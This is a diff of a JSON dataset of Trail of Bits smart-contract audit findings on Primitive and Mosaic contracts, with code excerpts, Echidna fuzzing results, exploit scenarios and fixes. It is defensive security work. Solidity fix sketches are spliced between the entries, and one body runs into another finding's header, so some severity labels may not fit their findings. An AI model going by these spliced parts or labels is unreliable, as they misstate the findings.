Recommendations Short term, implement the getAmountsOut function and have it call the queryBatchSwap function on the Balancer Vault. Long term, add unit tests for all functions to test all flows. Unit tests will detect incorrect function behavior.", "labels": [ "Trail of Bits", - "Severity: Undetermined", + "Severity: Medium", "Difficulty: Low" ] }, {
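A sketch of that short-term recommendation, assuming the Balancer V2 IVault interface and a caller-supplied pool id (the poolId decoding and the vault variable are illustrative; pure must be dropped because queryBatchSwap is not a view function, so this is meant to be executed via eth_call):
function getAmountsOut ( address tokenIn, address tokenOut, uint256 amountIn, bytes calldata data ) external override returns ( uint256 ) {
    bytes32 poolId = abi.decode(data, (bytes32)); // hypothetical: pool id supplied by the caller
    IVault.BatchSwapStep[] memory swaps = new IVault.BatchSwapStep[](1);
    swaps[0] = IVault.BatchSwapStep(poolId, 0, 1, amountIn, \"\");
    IAsset[] memory assets = new IAsset[](2);
    assets[0] = IAsset(tokenIn);
    assets[1] = IAsset(tokenOut);
    IVault.FundManagement memory funds = IVault.FundManagement(address(this), false, payable(address(this)), false);
    int256[] memory deltas = vault.queryBatchSwap(IVault.SwapKind.GIVEN_IN, swaps, assets, funds);
    return uint256(-deltas[1]); // the amount owed to the caller is reported as a negative delta
}
- "title": "9. Inconsistency in allocate and remove functions ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Primitive.pdf", - "body": "The allocate and remove functions do not have the same interface, as one would expect. The allocate function allows users to set the recipient of the allocated liquidity and choose whether the funds will be taken from the margins or sent directly. 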
The remove function unallocates the liquidity from the pool and sends the tokens to the msg.sender ; with this function, users cannot set the recipient of the tokens or choose whether the tokens will be credited to their margins for future use or directly sent back to them. function allocate ( bytes32 poolId , address recipient , uint256 delRisky , uint256 delStable , bool fromMargin , bytes calldata data ) external override lock returns ( uint256 delLiquidity ) { if (delRisky == 0 || delStable == 0 ) revert ZeroDeltasError(); Reserve.Data storage reserve = reserves[poolId]; if (reserve.blockTimestamp == 0 ) revert UninitializedError(); uint32 timestamp = _blockTimestamp(); if (timestamp > calibrations[poolId].maturity) revert PoolExpiredError(); uint256 liquidity0 = (delRisky * reserve.liquidity) / uint256 (reserve.reserveRisky); uint256 liquidity1 = (delStable * reserve.liquidity) / uint256 (reserve.reserveStable); delLiquidity = liquidity0 < liquidity1 ? liquidity0 : liquidity1; if (delLiquidity == 0 ) revert ZeroLiquidityError(); liquidity[recipient][poolId] += delLiquidity; // increase position liquidity reserve.allocate(delRisky, delStable, delLiquidity, timestamp); // increase reserves and liquidity if (fromMargin) { margins.withdraw(delRisky, delStable); // removes tokens from `msg.sender` margin account } else { ( uint256 balRisky , uint256 balStable ) = (balanceRisky(), balanceStable()); IPrimitiveLiquidityCallback( msg.sender ).allocateCallback(delRisky, delStable, data); // agnostic payment checkRiskyBalance(balRisky + delRisky); checkStableBalance(balStable + delStable); } emit Allocate( msg.sender , recipient, poolId, delRisky, delStable); } Figure 9.1: rmm-core/contracts/PrimitiveEngine.sol#L236-L268 Recommendations Short term, either document the design decision or add the logic to the remove function allowing users to set the recipient and to choose whether the tokens should be credited to their margins . Long term, make sure to document design decisions and the rationale behind them, especially for behavior that may not be obvious.", + "title": "28. Lack of events for critical operations ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/AdvancedBlockchainQ12022.pdf", + "body": "Several critical operations do not trigger events. As a result, it will be difficult to review the correct behavior of the contracts once they have been deployed. For example, the setRelayer function, which is called in the MosaicVault contract to set the relayer address, does not emit an event providing confirmation of that operation to the contract's caller (figure 28.1). function setRelayer ( address _relayer ) external override onlyOwner { relayer = _relayer; } Figure 28.1: The setRelayer() function in MosaicVault:80-82 Without events, users and blockchain-monitoring systems cannot easily detect suspicious behavior. Exploit Scenario Eve, an attacker, is able to take ownership of the MosaicVault contract. She then sets a new relayer address. Alice, a Composable Finance team member, is unaware of the change and does not raise a security incident. Recommendations Short term, add events for all critical operations that result in state changes. Events aid in contract monitoring and the detection of suspicious behavior.
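A minimal sketch of that recommendation applied to the function in figure 28.1 (the event name is illustrative):
event RelayerChanged(address indexed oldRelayer, address indexed newRelayer);
function setRelayer ( address _relayer ) external override onlyOwner {
    emit RelayerChanged(relayer, _relayer); // on-chain confirmation that monitoring systems can index
    relayer = _relayer;
}
Long term, consider using a blockchain-monitoring system to track any suspicious behavior in the contracts. The system relies on several contracts to behave as expected. 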
A monitoring mechanism for critical events would quickly detect any compromised system components. 30. Insufficient protection of sensitive information Severity: Medium Difficulty: High Type: Configuration Finding ID: TOB-CMP-30 Target: CrosslayerPortal/env , bribe-protocol/hardhat.config.ts", "labels": [ "Trail of Bits", - "Severity: Informational", + "Severity: Medium", "Difficulty: Low" ] }, { - "title": "10. Areas of the codebase that are inconsistent with the documentation ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Primitive.pdf", - "body": "The Primitive codebase contains clear documentation and mathematical analysis denoting the intended behavior of the system. However, we identied certain areas in which the implementation does not match the white paper, including the following: Expected range for the gamma value of a pool. The white paper denes 10,000 as 100% in the smart contract; however, the contract checks that the provided gamma is between 9,000 (inclusive) and 10,000 (exclusive); if it is not within this range, the pool reverts with a GammaError . The white paper should be updated to reect the behavior of the code in these areas. Recommendations Short term, review and properly document all areas of the codebase with this gamma range check. Long term, ensure that the formal specication matches the expected behavior of the protocol.", + "title": "5. Accrued interest is not attributable to the underlying investor on-chain ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/AdvancedBlockchainQ12022.pdf", + "body": "When an investor earns interest-bearing tokens by lending funds through Mosaic's investment strategies, the tokens are not directly attributed to the investor by on-chain data. The claim() function, which can be called only by the owner of the MosaicHolding contract, is defined in the contract and used to redeem interest-bearing tokens from protocols such as Aave and Compound (figure 5.1). The underlying tokens of these protocols' lending pools are provided by users who are interacting with the Mosaic system and wish to earn rewards on their idle funds. function claim ( address _investmentStrategy , bytes calldata _data) external override onlyAdmin validAddress(_investmentStrategy) { require (investmentStrategies[_investmentStrategy], \"ERR: STRATEGY NOT SET\" ); address rewardTokenAddress = IInvestmentStrategy(_investmentStrategy).claimTokens(_data); emit TokenClaimed(_investmentStrategy, rewardTokenAddress); } Figure 5.1: The claim function in MosaicHolding:270-279 During the execution of claim() , the internal claimTokens() function calls into the AaveInvestmentStrategy , CompoundInvestmentStrategy , or SushiswapLiquidityProvider contract, which effectively transfers its balance of the interest-bearing token directly to the MosaicHolding contract. Figure 5.2 shows the claimTokens() function call in AaveInvestmentStrategy . 
function claimTokens ( bytes calldata data) external override onlyInvestor returns ( address ) { address token = abi.decode(data, ( address )); ILendingPool lendingPool = ILendingPool(lendingPoolAddressesProvider.getLendingPool()); DataTypes.ReserveData memory reserve = lendingPool.getReserveData(token); IERC20Upgradeable(reserve.aTokenAddress).safeTransfer( mosaicHolding, IERC20Upgradeable(reserve.aTokenAddress).balanceOf( address ( this )) ); return reserve.aTokenAddress; } Figure 5.2: The claimTokens function in AaveInvestmentStrategy:58-68 However, there is no identifiable mapping or data structure attributing a percentage of those rewards to a given user. The off-chain relayer service is responsible for holding such mappings and rewarding users with the interest they have accrued upon withdrawal (see the relayer bot assumptions in the Project Coverage section). Exploit Scenario Investors Alice and Bob, who wish to earn interest on their idle USDC, decide to use the Mosaic system to provide loans. Mosaic invests their money in Aave's lending pool for USDC. However, there is no way for the parties to discern their ownership stakes in the lending pool through the smart contract logic. The owner of the contract decides to call the claim() function and redeem all aUSDC associated with Alice's and Bob's positions. When Bob goes to withdraw his funds, he has to trust that the relayer will send him his claim on the aUSDC without any on-chain verification. Recommendations Short term, consider implementing a way to identify the amount of each investor's stake in a given investment strategy. Currently, the relayer is responsible for tracking all rewards. Long term, review the privileges and responsibilities of the relayer and architect a more robust solution for managing investments.", "labels": [ "Trail of Bits", - "Severity: Informational", - "Difficulty: Low" + "Severity: Low", + "Difficulty: Undetermined" ] }, {
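One possible direction for that short-term recommendation, sketched as a per-strategy share ledger kept on-chain (all names hypothetical):
// strategy => investor => shares, plus a per-strategy total, so each investor's claim on
// redeemed rewards can be computed as shares[strategy][investor] / totalShares[strategy].
mapping(address => mapping(address => uint256)) public shares;
mapping(address => uint256) public totalShares;
function _recordDeposit(address strategy, address investor, uint256 amount) internal {
    shares[strategy][investor] += amount;
    totalShares[strategy] += amount;
}
- "title": "11. Allocate and remove are not exact inverses of each other ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Primitive.pdf", - "body": "Due to the rounding logic used in the codebase, when users allocate funds into a system, they may not receive the same amount back when they remove them. 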
When funds are allocated into a system, the values are rounded down (through native truncation) when they are added to the reserves: /// @notice Add to both reserves and total supply of liquidity /// @param reserve Reserve storage to manipulate /// @param delRisky Amount of risky tokens to add to the reserve /// @param delStable Amount of stable tokens to add to the reserve /// @param delLiquidity Amount of liquidity created with the provided tokens /// @param blockTimestamp Timestamp used to update cumulative reserves function allocate ( Data storage reserve, uint256 delRisky , uint256 delStable , uint256 delLiquidity , uint32 blockTimestamp ) internal { update(reserve, blockTimestamp); reserve.reserveRisky += delRisky.toUint128(); reserve.reserveStable += delStable.toUint128(); reserve.liquidity += delLiquidity.toUint128(); } Figure 11.1: rmm-core/contracts/libraries/Reserve.sol#L70-L87 When funds are removed from the reserves, they are similarly truncated: /// @notice Remove from both reserves and total supply of liquidity /// @param reserve Reserve storage to manipulate /// @param delRisky Amount of risky tokens to remove to the reserve /// @param delStable Amount of stable tokens to remove to the reserve /// @param delLiquidity Amount of liquidity removed from total supply /// @param blockTimestamp Timestamp used to update cumulative reserves function remove( Data storage reserve, uint256 delRisky, uint256 delStable, uint256 delLiquidity, uint32 blockTimestamp ) internal { update(reserve, blockTimestamp); reserve.reserveRisky -= delRisky.toUint128(); reserve.reserveStable -= delStable.toUint128(); reserve.liquidity -= delLiquidity.toUint128(); } Figure 11.2: rmm-core/contracts/libraries/Reserve.sol#L89-L106 We used the following Echidna property to test this behavior: function check_allocate_remove_inverses( uint256 randomId, uint256 intendedLiquidity, bool fromMargin ) public { AllocateCall memory allocate; allocate.poolId = Addresses.retrieve_created_pool(randomId); retrieve_current_pool_data(allocate.poolId, true ); intendedLiquidity = E2E_Helper.one_to_max_uint64(intendedLiquidity); allocate.delRisky = (intendedLiquidity * precall.reserve.reserveRisky) / precall.reserve.liquidity; allocate.delStable = (intendedLiquidity * precall.reserve.reserveStable) / precall.reserve.liquidity; uint256 delLiquidity = allocate_helper(allocate); // these are calculated the amount returned when remove is called ( uint256 removeRisky, uint256 removeStable) = remove_should_succeed(allocate.poolId, delLiquidity); emit AllocateRemoveDifference(allocate.delRisky, removeRisky); emit AllocateRemoveDifference(allocate.delStable, removeStable); assert (allocate.delRisky == removeRisky); assert (allocate.delStable == removeStable); assert (intendedLiquidity == delLiquidity); } Figure 11.3: rmm-core/contracts/libraries/Reserve.sol#L89-L106 In considering this rounding logic, we used Echidna to calculate the most optimal allocate value for an amount of liquidity, which resulted 1,920,041,647,503 as the dierence in the amount allocated and the amount removed. check_allocate_remove_inverses(uint256,uint256,bool): failed! 
Call sequence: create_new_pool_should_not_revert(113263940847354084267525170308314,0,12,58,414705177,292070 35433870938731770491094459037949100611312053389816037169023399245174) from: 0x0000000000000000000000000000000000020000 Gas: 0xbebc20 check_allocate_remove_inverses(513288669432172152578276403318402760987129411133329015270396, 675391606931488162786753316903883654910567233327356334685,false) from: 0x1E2F9E10D02a6b8F8f69fcBf515e75039D2EA30d Event sequence: Panic(1), Transfer(6361150874), Transfer(64302260917206574294870), AllocateMarginBalance(0, 0, 6361150874, 64302260917206574294870), Transfer(6361150874), Transfer(64302260917206574294870), Allocate(6361150874, 64302260917206574294870), Remove(6361150873, 64302260915286532647367), AllocateRemoveDifference(6361150874, 6361150873), AllocateRemoveDifference( 64302260917206574294870, 64302260915286532647367 ) Figure 11.4: Echidna results Exploit Scenario Alice, a Primitive user, determines a specic amount of liquidity that she wants to put into the system. She calculates the required risky and stable tokens to make the trade, and then allocates the funds to the pool. Due to the rounding direction in the allocate operation and the pool, she receives less than she expected after removing her liquidity. Recommendations Short term, perform additional analysis to determine a safe delta value to allow the allocate and remove operations to happen. Document this issue for end users to ensure that they are aware of the rounding behavior. Long term, use Echidna to test system and mathematical invariants.", + "title": "6. User funds can become trapped in nonstandard token contracts ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/AdvancedBlockchainQ12022.pdf", + "body": "If a user's funds are transferred to a token contract that violates the ERC20 standard, the funds may become permanently trapped in that token contract. In the MsgReceiver contract, there are six calls to the transfer() function. See figure 6.1 for an example. function approveERC20TokenAndForwardCall( uint256 _feeAmount, address _feeToken, address _feeReceiver, address _token, uint256 _amount, bytes32 _id, address _contract, bytes calldata _data ) external payable onlyOwnerOrRelayer returns ( bool success, bytes memory returnData) { require ( IMsgReceiverFactory(msgReceiverFactory).whitelistedFeeTokens(_feeToken), \"Fee token is not whitelisted\" ); require (!forwarded[_id], \"call already forwared\" ); //approve tokens to _contract IERC20(_token).safeIncreaseAllowance(_contract, _amount); // solhint-disable-next-line avoid-low-level-calls (success, returnData) = _contract.call{value: msg.value }(_data); require (success, \"Failed to forward function call\" ); uint256 balance = IERC20(_feeToken).balanceOf( address ( this )); require (balance >= _feeAmount, \"Not enough tokens for the fee\" ); forwarded[_id] = true ; IERC20(_feeToken).transfer(_feeReceiver, _feeAmount); } Figure 6.1: The approveERC20TokenAndForwardCall function in MsgReceiver:98- When implemented in accordance with the ERC20 standard, the transfer() function returns a boolean indicating whether a transfer operation was successful. However, tokens that implement the ERC20 interface incorrectly may not return true upon a successful transfer, in which case the transaction will revert and the user's funds will be locked in the token contract. Exploit Scenario Alice, the owner of the MsgReceiverFactory contract, adds a fee token that is controlled by Eve. 
Eve's token contract incorrectly implements the ERC20 interface. Bob interacts with MsgReceiver and calls a function that executes a transfer to _feeReceiver , which is controlled by Eve. Because Eve's fee token contract does not provide a return value, Bob's transfer reverts. Recommendations Short term, use safeTransfer() for token transfers and use the SafeERC20 library for interactions with ERC20 token contracts. Long term, develop a process for onboarding new fee tokens. Review our Token Integration Checklist for guidance on the onboarding process. References Missing Return Value Bug", "labels": [ "Trail of Bits", "Severity: Low", - "Difficulty: Low" + "Difficulty: High" ] }, { - "title": "12. scaleToX64() and scalefromX64() are not inverses of each other ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Primitive.pdf", - "body": "The Units library provides the scaleToX64() and scalefromX64() helper functions to convert unsigned integers to signed 64x64 xed-point values, and vice versa. Due to rounding errors, these functions are not direct inverses of each other. /// @notice Converts unsigned 256-bit wei value into a fixed point 64.64 number /// @param value Unsigned 256-bit wei amount, in native precision /// @param factor Scaling factor for `value`, used to calculate decimals of `value` /// @return y Signed 64.64 fixed point number scaled from native precision function scaleToX64 ( uint256 value , uint256 factor ) internal pure returns ( int128 y ) { uint256 scaleFactor = PRECISION / factor; y = value.divu(scaleFactor); } Figure 12.1: rmm-core/contracts/libraries/Units.sol#L35-L42 These two functions use ABDKMath64x64.divu() and ABDKMath64x64.mulu() , which both round downward toward zero. As a result, if a uint256 value is converted to a signed 64x64 xed point and then converted back to a uint256 value, the result will not equal the original uint256 value: /// @notice Converts signed fixed point 64.64 number into unsigned 256-bit wei value /// @param value Signed fixed point 64.64 number to convert from precision of 10^18 /// @param factor Scaling factor for `value`, used to calculate decimals of `value` /// @return y Unsigned 256-bit wei amount scaled to native precision of 10^(18 - factor) function scalefromX64 ( int128 value , uint256 factor ) internal pure returns ( uint256 y ) { uint256 scaleFactor = PRECISION / factor; y = value.mulu(scaleFactor); } Figure 12.2: rmm-core/contracts/libraries/Units.sol#L44-L51 We used the following Echidna property to test this behavior: function scaleToAndFromX64Inverses (uint256 value , uint256 _decimals ) public { // will enforce factor between 0 - 12 uint256 factor = _decimals % ( 13 ); // will enforce scaledFactor between 1 - 10**12 , because 10**0 = 1 uint256 scaledFactor = 10 **factor; int128 scaledUpValue = value.scaleToX64(scaledFactor); uint256 scaledDownValue = scaledUpValue.scalefromX64(scaledFactor); assert(scaledDownValue == value); } Figure 12.3: contracts/crytic/LibraryMathEchidna.sol scaleToAndFromX64Inverses(uint256,uint256): failed! Call sequence: scaleToAndFromX64Inverses(1,0) Event sequence: Panic(1) Figure 12.4: Echidna results Recommendations Short term, ensure that the percentages round in the correct direction to minimize rounding errors. Long term, use Echidna to test system and mathematical invariants.", + "title": "13. 
Use of MsgReceiver to check _feeToken status leads to unnecessary gas consumption ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/AdvancedBlockchainQ12022.pdf", + "body": "Checking the whitelist status of a token only on the receiving end of a message call can lead to excessive gas consumption. As part of a cross-chain message call, all functions in the MsgReceiver contract check whether the token used for the payment to _feeReceiver ( _feeToken ) is a whitelisted token (figure 13.1). Tokens are whitelisted by the owner of the MsgReceiverFactory contract. function approveERC20TokenAndForwardCall( uint256 _feeAmount, address _feeToken, address _feeReceiver, address _token, uint256 _amount, bytes32 _id, address _contract, bytes calldata _data ) external payable onlyOwnerOrRelayer returns ( bool success, bytes memory returnData) { require ( IMsgReceiverFactory(msgReceiverFactory).whitelistedFeeTokens(_feeToken), \"Fee token is not whitelisted\" ); require (!forwarded[_id], \"call already forwared\" ); //approve tokens to _contract IERC20(_token).safeIncreaseAllowance(_contract, _amount); // solhint-disable-next-line avoid-low-level-calls (success, returnData) = _contract.call{value: msg.value }(_data); require (success, \"Failed to forward function call\" ); uint256 balance = IERC20(_feeToken).balanceOf( address ( this )); require (balance >= _feeAmount, \"Not enough tokens for the fee\" ); forwarded[_id] = true ; IERC20(_feeToken).transfer(_feeReceiver, _feeAmount); } Figure 13.1: The approveERC20TokenAndForwardCall function in MsgReceiver:98-123 This validation should be performed before the MsgSender contract emits the related event (figure 13.2). This is because the relayer will act upon the emitted event on the receiving chain regardless of whether _feeToken is set to a whitelisted token. function registerCrossFunctionCallWithTokenApproval( uint256 _chainId, address _destinationContract, address _feeToken, address _token, uint256 _amount, bytes calldata _methodData ) external override nonReentrant onlyWhitelistedNetworks(_chainId) onlyUnpausedNetworks(_chainId) whenNotPaused { bytes32 id = _generateId(); //shouldn't happen require (hasBeenForwarded[id] == false , \"Call already forwarded\" ); require (lastForwardedCall != id, \"Forwarded last time\" ); lastForwardedCall = id; hasBeenForwarded[id] = true ; emit ForwardCallWithTokenApproval( msg.sender , id, _chainId, _destinationContract, _feeToken , _token, _amount, _methodData ); } Figure 13.2: The registerCrossFunctionCallWithTokenApproval function in MsgSender:169-203 Exploit Scenario On Arbitrum, a low-fee network, Eve creates a theoretically infinite series of transactions to be sent to MsgSender , with _feeToken set to a token that she knows is not whitelisted. The relayer relays the series of message calls to a MsgReceiver contract on Ethereum, a high-fee network, and all of the transactions revert. However, the relayer has to pay the intrinsic gas cost for each transaction, with no repayment, while allowing its internal queue to be filled up with malicious transactions. Recommendations Short term, move the logic for token whitelisting and validation to the MsgSender contract. Long term, analyze the implications of the ability to create numerous message calls on low-fee networks and its impact on relayer performance.", "labels": [ "Trail of Bits", - "Severity: Informational", - "Difficulty: Low" + "Severity: Low", + "Difficulty: Medium" ] }, {
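A sketch of that short-term recommendation (assuming a fee-token whitelist mirrored on the sending chain; the mapping and its administration are hypothetical):
mapping(address => bool) public whitelistedFeeTokens; // maintained by the owner on the sending chain
function registerCrossFunctionCallWithTokenApproval( uint256 _chainId, address _destinationContract, address _feeToken, address _token, uint256 _amount, bytes calldata _methodData ) external override nonReentrant onlyWhitelistedNetworks(_chainId) onlyUnpausedNetworks(_chainId) whenNotPaused {
    // Reject non-whitelisted fee tokens before the event is emitted, so the relayer never
    // pays intrinsic gas for a call that is guaranteed to revert on the destination chain.
    require(whitelistedFeeTokens[_feeToken], \"Fee token is not whitelisted\");
    // ... generate the id and emit ForwardCallWithTokenApproval as in figure 13.2 ...
}
- "title": "13. 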
getCDF always returns output in the range of (0, 1) ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Primitive.pdf", - "body": "CumulativeNormalDistribution provides the getCDF function to calculate an approximation of the cumulative distribution function, which should result in (0, 1] ; however, the getCDF function could return 1 . /// @notice Uses Abramowitz and Stegun approximation: /// https://en.wikipedia.org/wiki/Abramowitz_and_Stegun /// @dev Maximum error: 3.15x10-3 /// @return Standard Normal Cumulative Distribution Function of `x` function getCDF( int128 x) internal pure returns ( int128 ) { int128 z = x.div(CDF3); int128 t = ONE_INT.div(ONE_INT.add(CDF0.mul(z.abs()))); int128 erf = getErrorFunction(z, t); if (z < 0 ) { erf = erf.neg(); } int128 result = (HALF_INT).mul(ONE_INT.add(erf)); return result; } Figure 13.1: rmm-core/contracts/libraries/CumulativeNormalDistribution.sol#L24-L37 We used the following Echidna property to test this behavior. function CDFCheckRange( uint128 x, uint128 neg) public { int128 x_x = realisticCDFInput(x, neg); int128 res = x_x.getCDF(); emit P(x_x, res, res.toInt()); assert (res > 0 && res.toInt() < 1 ); } Figure 13.2: rmm-core/contracts/LibraryMathEchidna.sol CDFCheckRange(uint128,uint128): failed! Call sequence: CDFCheckRange(168951622815827493037,1486973755574663235619590266651) Event sequence: Panic(1), P(168951622815827493037, 18446744073709551616, 1) Figure 13.3: Echidna results Recommendations Short term, perform additional analysis to determine whether this behavior is an issue for the system. Long term, use Echidna to test system and mathematical invariants.", + "title": "14. Active liquidity providers can set arbitrary _tokenOut values when withdrawing liquidity ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/AdvancedBlockchainQ12022.pdf", + "body": "An active liquidity provider (LP) can move his or her liquidity into any token, even one that the LP controls. When a relayer acts upon a WithdrawRequest event triggered by an active LP, the MosaicVault contract checks only that the address of _tokenOut (the token being requested) is not the zero address (figure 14.1). Outside of that constraint, _tokenOut can effectively be set to any token, even one that might have vulnerabilities. function _withdraw( address _accountTo, uint256 _amount, address _tokenIn, address _tokenOut, uint256 _amountOutMin, WithdrawData calldata _withdrawData, bytes calldata _data ) internal onlyWhitelistedToken(_tokenIn) validAddress(_tokenOut) nonReentrant onlyOwnerOrRelayer whenNotPaused returns ( uint256 withdrawAmount) Figure 14.1: The signature of the _withdraw function in MosaicVault:404-419 This places the burden of ensuring the swap's success on the decentralized exchange, and, as the application grows, can lead to unintended code behavior. Exploit Scenario Eve, a malicious active LP, is able to trigger undefined behavior in the system by setting _tokenOut to a token that is vulnerable to exploitation. Recommendations Short term, analyze the implications of allowing _tokenOut to be set to an arbitrary token. Long term, validate the assumptions surrounding the lack of limits on _tokenOut as the codebase grows, and review our Token Integration Checklist to identify any related pitfalls. References imBTC Uniswap Hack", "labels": [ "Trail of Bits", "Severity: Low", - "Difficulty: Low" + "Difficulty: High" ] }, {
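One conservative mitigation, sketched by reusing the contract's existing onlyWhitelistedToken modifier on the requested output token (illustrative; whether an allowlist fits the product's requirements is a design decision):
function _withdraw( address _accountTo, uint256 _amount, address _tokenIn, address _tokenOut, uint256 _amountOutMin, WithdrawData calldata _withdrawData, bytes calldata _data ) internal
    onlyWhitelistedToken(_tokenIn)
    onlyWhitelistedToken(_tokenOut) // restrict the output token to vetted assets, not merely non-zero addresses
    nonReentrant onlyOwnerOrRelayer whenNotPaused returns ( uint256 withdrawAmount)
- "title": "14. 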
Lack of data validation on withdrawal operations ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Primitive.pdf", - "body": "The withdraw function allows users to specify the recipient to send funds to. Due to a lack of data validation, the address of the engine could be set as the recipient. As a result, the tokens will be transferred directly to the engine itself. /// @inheritdoc IPrimitiveEngineActions function withdraw ( address recipient , uint256 delRisky , uint256 delStable ) external override lock { if (delRisky == 0 && delStable == 0 ) revert ZeroDeltasError(); margins.withdraw(delRisky, delStable); // state update if (delRisky != 0 ) IERC20(risky).safeTransfer(recipient, delRisky); if (delStable != 0 ) IERC20(stable).safeTransfer(recipient, delStable); emit Withdraw( msg.sender , recipient, delRisky, delStable); } Figure 14.1: rmm-core/contracts/PrimitiveEngine.sol#L221-L232 We used the following Echidna property to test this behavior. function withdraw_with_only_non_zero_addr( address recipient, uint256 delRisky, uint256 delStable ) public { require (recipient != address ( 0 )); //ensures that delRisky and delStable are at least 1 and not too large to overflow the deposit delRisky = E2E_Helper.one_to_max_uint64(delRisky); delStable = E2E_Helper.one_to_max_uint64(delStable); MarginHelper memory senderMargins = populate_margin_helper( address ( this )); if (senderMargins.marginRisky < delRisky || senderMargins.marginStable < delStable) { withdraw_should_revert(recipient, delRisky, delStable); } else { withdraw_should_succeed(recipient, delRisky, delStable); } } function withdraw_should_succeed ( address recipient , uint256 delRisky , uint256 delStable ) internal { MarginHelper memory precallSender = populate_margin_helper( address ( this )); MarginHelper memory precallRecipient = populate_margin_helper(recipient); uint256 balanceRecipientRiskyBefore = risky.balanceOf(recipient); uint256 balanceRecipientStableBefore = stable.balanceOf(recipient); uint256 balanceEngineRiskyBefore = risky.balanceOf( address (engine)); uint256 balanceEngineStableBefore = stable.balanceOf( address (engine)); ( bool success , ) = address (engine).call( abi.encodeWithSignature( \"withdraw(address,uint256,uint256)\" , recipient, delRisky, delStable) ); if (!success) { assert( false ); return ; } { assert_post_withdrawal(precallSender, precallRecipient, recipient, delRisky, delStable); //check token balances uint256 balanceRecipientRiskyAfter = risky.balanceOf(recipient); uint256 balanceRecipientStableAfter = stable.balanceOf(recipient); uint256 balanceEngineRiskyAfter = risky.balanceOf( address (engine)); uint256 balanceEngineStableAfter = stable.balanceOf( address (engine)); emit DepositWithdraw( \"balance recip risky\" , balanceRecipientRiskyBefore, balanceRecipientRiskyAfter, delRisky); emit DepositWithdraw( \"balance recip stable\" , balanceRecipientStableBefore, balanceRecipientStableAfter, delStable); emit DepositWithdraw( \"balance engine risky\" , balanceEngineRiskyBefore, balanceEngineRiskyAfter, delRisky); emit DepositWithdraw( \"balance engine stable\" , balanceEngineStableBefore, balanceEngineStableAfter, delStable); assert(balanceRecipientRiskyAfter == balanceRecipientRiskyBefore + delRisky); assert(balanceRecipientStableAfter == balanceRecipientStableBefore + delStable); assert(balanceEngineRiskyAfter == balanceEngineRiskyBefore - delRisky); assert(balanceEngineStableAfter == balanceEngineStableBefore - delStable); } } Figure 14.2: 
rmm-core/contracts/crytic/E2E_Deposit_Withdrawal.sol withdraw_with_safe_range(address,uint256,uint256): failed! Call sequence: deposit_with_safe_range(0xa329c0648769a73afac7f9381e08fb43dbea72,115792089237316195423570985 008687907853269984665640564039447584007913129639937,5964323976539599410180707317759394870432 1625682232592596462650205581096120955) from: 0x1E2F9E10D02a6b8F8f69fcBf515e75039D2EA30d withdraw_with_safe_range(0x48bacb9266a570d521063ef5dd96e61686dbe788,5248038478797710845,748) from: 0x6A4A62E5A7eD13c361b176A5F62C2eE620Ac0DF8 Event sequence: Panic(1), Transfer(5248038478797710846), Transfer(749), Withdraw(5248038478797710846, 749), DepositWithdraw(\"sender risky\", 8446744073709551632, 3198705594911840786, 5248038478797710846), DepositWithdraw(\"sender stable\", 15594018607531992466, 15594018607531991717, 749), DepositWithdraw(\"balance recip risky\", 8446744073709551632, 8446744073709551632, 5248038478797710846), DepositWithdraw(\"balance recip stable\", 15594018607531992466, 15594018607531992466, 749), DepositWithdraw(\"balance engine risky\", 8446744073709551632, 8446744073709551632, 5248038478797710846), DepositWithdraw(\"balance engine stable\", 15594018607531992466, 15594018607531992466, 749) Figure 14.3: Echidna results Exploit Scenario Alice, a user, withdraws her funds from the Primitive engine. She accidentally species the address of the recipient as the engine address, and her funds are left stuck in the contract. Recommendations Short term, add a check to ensure that users cannot withdraw to the engine address directly to ensure that users are protected from these mistakes. Long term, use Echidna to test system and mathematical invariants.", + "title": "15. Withdrawal assumptions may lead to transfers of an incorrect token ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/AdvancedBlockchainQ12022.pdf", + "body": "The CurveTricryptoStrategy contract manages liquidity in Curve pools and facilitates transfers of tokens between chains. While it is designed to work with one curve vault, the vault can be set to an arbitrary pool. Thus, the contract should not make assumptions regarding the pool without validation. Each pool contains an array of tokens specifying the tokens to withdraw from that pool. However, when the vault address is set in the constructor of CurveTricryptoConfig , the pool's address is not checked against the TriCrypto pool's address. The token at index 2 in the coins array is assumed to be wrapped ether (WETH), as indicated by the code comment shown in figure 15.1. If the configuration is incorrect, a different token may be unintentionally transferred. if (unwrap) { //unwrap LP into weth transferredToken = tricryptoConfig.tricryptoLPVault().coins( 2 ); [...] Figure 15.1: Part of the transferLPs function in CurveTricryptoStrategy.sol:377-379 Exploit Scenario The Curve pool array, coins , stores an address other than that of WETH in index 2. As a result, a user mistakenly sends the wrong token in a transfer. Recommendations Short term, have the constructor of CurveTricryptoConfig or the transferLPs function validate that the address of transferredToken is equal to the address of WETH. Long term, validate data from external contracts, especially data involved in the transfer of funds.", "labels": [ "Trail of Bits", - "Severity: Informational", + "Severity: Low", "Difficulty: Low" ] }, { + "title": "16. Improper validation of Chainlink data ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/AdvancedBlockchainQ12022.pdf", + "body": "The latestRoundData function returns a signed integer that is coerced to an unsigned integer without checking that the value is positive. An overflow (e.g., uint(-1) ) would result in drastic misrepresentation of the price and unexpected behavior. In addition, ChainlinkLib does not ensure the completeness or recency of round data, so pricing data may not reflect recent changes. It is best practice to define a window in which data is considered sufficiently recent (e.g., within a minute of the last update) by comparing the block timestamp to updatedAt . (, int256 price , , , ) = _aggregator.latestRoundData(); return uint256 (price); Figure 16.1: Part of the getCurrentTokenPrice function in ChainlinkLib.sol:113-114 Recommendations Short term, have latestRoundData and similar functions verify that values are non-negative before converting them to unsigned integers, and add an invariant require(updatedAt != 0 && answeredInRound == roundID) to ensure that the round has finished and that the pricing data is from the current round. Long term, define a minimum update threshold and add the following check: require((block.timestamp - updatedAt <= minThreshold) && (answeredInRound == roundID)) .", "labels": [ "Trail of Bits", - "Severity: Informational", + "Severity: Low", - "Difficulty: Low" + "Difficulty: Medium" ] }, {
